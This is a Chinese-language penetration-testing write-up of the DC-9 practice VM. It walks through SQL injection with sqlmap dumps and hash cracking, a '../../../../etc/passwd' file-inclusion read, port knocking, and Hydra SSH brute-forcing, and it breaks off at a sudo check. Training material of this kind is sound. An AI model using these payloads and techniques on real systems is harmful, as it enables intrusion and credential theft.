DC-9渗透学习

开靶机，net模式，启动

arp-scan -l命令扫描存活主机

nmap -sS -sV -A -n 192.168.100.22

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:21 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds

我这里使用无糖的软件直接扫

指纹扫一下80端口

kali访问一下

发现点击dispaly后会显示一些类似数据库中的信息



同样看一下search和manage

尝试在search页面进行sql注入,发现有回显

1' or 1=1 #

使用sqlmap尝试爆破

爆库

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -dbs
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.12.9#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:25:47 /2024-01-31/

[20:25:47] [INFO] testing connection to the target URL
[20:25:47] [INFO] testing if the target URL content is stable
[20:25:48] [INFO] target URL content is stable
[20:25:48] [INFO] testing if POST parameter 'search' is dynamic
[20:25:48] [WARNING] POST parameter 'search' does not appear to be dynamic
[20:25:48] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[20:25:48] [INFO] testing for SQL injection on POST parameter 'search'
[20:25:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:25:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:25:48] [INFO] testing 'Generic inline queries'
[20:25:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:25:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:25:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:08] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:26:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:26:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:26:18] [INFO] target URL appears to be UNION injectable with 6 columns
[20:26:18] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:26:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:26:26] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[20:26:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:26:26 /2024-01-31/

爆表

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:27:18 /2024-01-31/

[20:27:19] [INFO] resuming back-end DBMS 'mysql'
[20:27:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:27:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:27:19] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[20:27:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:27:19 /2024-01-31/

爆数据

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -T UserDetails -dump
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:28:35 /2024-01-31/

[20:28:35] [INFO] resuming back-end DBMS 'mysql'
[20:28:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:28:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:28:35] [INFO] fetching columns for table 'UserDetails' in database 'users'
[20:28:35] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

[20:28:35] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/users/UserDetails.csv'
[20:28:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:28:35 /2024-01-31/

员工的账号密码

再把另一个表Staff爆一下

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.12.9#dev}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:30:50 /2024-01-31/

[20:30:50] [INFO] resuming back-end DBMS 'mysql'
[20:30:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:30:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:30:50] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[20:30:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:30:50 /2024-01-31/

爆第一张表StaffDetails

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T StaffDetails -dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.7.12.9#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:32:02 /2024-01-31/

[20:32:02] [INFO] resuming back-end DBMS 'mysql'
[20:32:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:32:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:32:02] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[20:32:02] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[20:32:02] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/StaffDetails.csv'
[20:32:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:32:02 /2024-01-31/

爆第二张表Users

┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T Users -dump
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.7.12.9#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org                                                            

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:33:02 /2024-01-31/

[20:33:03] [INFO] resuming back-end DBMS 'mysql'
[20:33:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:33:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[20:33:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[20:33:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:33:10] [INFO] writing hashes to a temporary file '/tmp/sqlmap4b1ullqp35516/sqlmaphashes-b6219vj2.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:33:15] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[20:33:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:33:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:33:26] [INFO] starting 4 processes
[20:33:35] [INFO] using suffix '1'
[20:33:40] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password                                         | Username |
+--------+--------------------------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin    |
+--------+--------------------------------------------------+----------+

[20:33:44] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/Users.csv'
[20:33:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'                                                                                                     

[*] ending @ 20:33:44 /2024-01-31/

爆出admin和密码，盲猜md5，密码sqlmap自动解密好了

admin
transorbital1

尝试登录后台

成功



看到多了一个选项

应该是一个添加用户的界面，看见下面有一个file does not exist，猜测有文件包含漏洞，之前只做过几道ctf，了解不是很深，好在这里不难

文件包含

**前置条件：
4.8.0 <= phpMyAdmin < 4.8.2

访问`http://x.x.x.x:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`，可见`/etc/passwd`被读取，说明文件包含漏洞存在

那尝试下呗

http://192.168.100.22/addrecord.php?file=../../../../etc/passwd

File does not exist
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

丢给chat

这是一个Unix-like系统中的/etc/passwd文件的内容，其中包含了用户账户的信息。每一行都代表一个用户账户，提供了用户名、用户ID（UID）、组ID（GID）、主目录以及默认shell等详细信息。

以下是一些示例用户：

用户名 root，用户ID 0，组ID 0，主目录 /root，默认shell /bin/bash。
用户名 marym，用户ID 1001，组ID 1001，主目录 /home/marym，默认shell /bin/bash。
用户名 julied，用户ID 1002，组ID 1002，主目录 /home/julied，默认shell /bin/bash。
用户名 fredf，用户ID 1003，组ID 1003，主目录 /home/fredf，默认shell /bin/bash。
用户名 barneyr，用户ID 1004，组ID 1004，主目录 /home/barneyr，默认shell /bin/bash。
如果您有具体的问题或需要进行特定操作，请告诉我，我将尽力协助。

新内容：

端口保护之端口敲门

knockd服务：即敲门端口服务，该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，，使系统开启需要访问的服务端口，才能对外访问，不使用时，再使用自定义序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性，它的默认配置文件是：/etc/knockd.conf

依次对其进行敲门，然后就可以开启ssh服务进行连接了，所以我们可以通过文件包含来显示该配置文件的内容

File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command =
/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
[closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D
INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn

老规矩，chat

你提供了一个与使用iptables管理SSH访问的配置片段。这个配置定义了基于指定TCP标志序列的打开和关闭SSH访问的命令。

让我来解释一下提供的信息：

1. **UseSyslog [openSSH]：**
   - `sequence = 7469,8475,9842`：指定了一个TCP标志序列。
   - `seq_timeout = 25`：为序列设置了超时值。
   - `command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`：当检测到指定序列时执行的命令。它添加了一个规则，允许来自指定IP地址的端口22的TCP流量。

2. **[closeSSH]：**
   - `sequence = 9842,8475,7469`：这是关闭序列，与打开序列的顺序相反。
   - `seq_timeout = 25`：类似于打开序列，设置了超时值。
   - `command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`：执行此命令以删除规则，并拒绝来自指定IP地址的端口22的TCP流量。

3. `tcpflags = syn`：两个配置都指定了基于SYN标志的序列，SYN标志通常用于TCP三次握手。

需要注意的是，`%IP%` 占位符似乎用于表示触发序列的IP地址。在运行时，此占位符可能被实际的IP地址替换。

在部署到生产环境之前，请在受控环境中测试此配置。此外，考虑使用这种方法打开和关闭SSH访问的安全性影响。

对7469,8475,9842进行挨个敲门

nmap -p 7469 192.168.100.22

nmap -p 8475 192.168.100.22

nmap -p 9842 192.168.100.22

或者

nc 192.168.100.22 7469

nc 192.168.100.22 8475

nc 192.168.100.22 9842

┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 7469
(UNKNOWN) [192.168.100.22] 7469 (?) : Connection refused

┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 8475
(UNKNOWN) [192.168.100.22] 8475 (?) : Connection refused

┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 9842
(UNKNOWN) [192.168.100.22] 9842 (?) : Connection refused

┌──(root㉿kali)-[~]
└─# nmap -p 22 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:08 EST
Nmap scan report for 192.168.100.22
Host is up (0.00014s latency).

PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 00:0C:29:21:69:DF (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

可以看到22端口开放了

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:23 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
|   256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_  256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.78 ms 192.168.100.22

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds

将UserDetails中的用户名密码写入txt

使用海德拉进行爆破

参数名 参数含义

-l 指定破解的用户，对特定用户破解

-L 指定用户名字典

-p 小写，指定密码破解，少用，一般是采用密码字典

-P 大写，指定密码字典

-R 继续从上一次进度接着破解

-S 大写，采用SSL链接

-s 小写，可通过这个参数指定非默认端口

-e 可选选项，n：空密码试探，s：使用指定用户和密码试探

-t 同时运行的线程数，默认为16

-C 使用冒号分割格式，例如“登录名:密码”来代替 -L/-P 参数

-M 指定目标列表文件一行一条

-o 指定结果输出文件

-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解

-w 设置最大超时的时间，单位秒，默认是30s

-v / -V 显示详细过程

server 目标ip

service 指定服务名，支持的服务和协议

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L users.txt -P pass.txt 192.168.100.22 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-31 21:38:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.100.22:22/
[22][ssh] host: 192.168.100.22   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.100.22   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.100.22   login: janitor   password: Ilovepeepee
[STATUS] 285.00 tries/min, 285 tries in 00:01h, 7 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-31 21:39:19

得到三个账号密码

分别进行ssh登录查看

断开命令：logout

chandlerb



joeyt



janitor

发现有一个可以文件夹



打开看看

janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

添加密码至passtxt重新爆破



找到一个新用户

尝试登录

对所有用户执行sudo -l后发现fredf结果不大一样

fredf@dc-9:~$ sudo -l
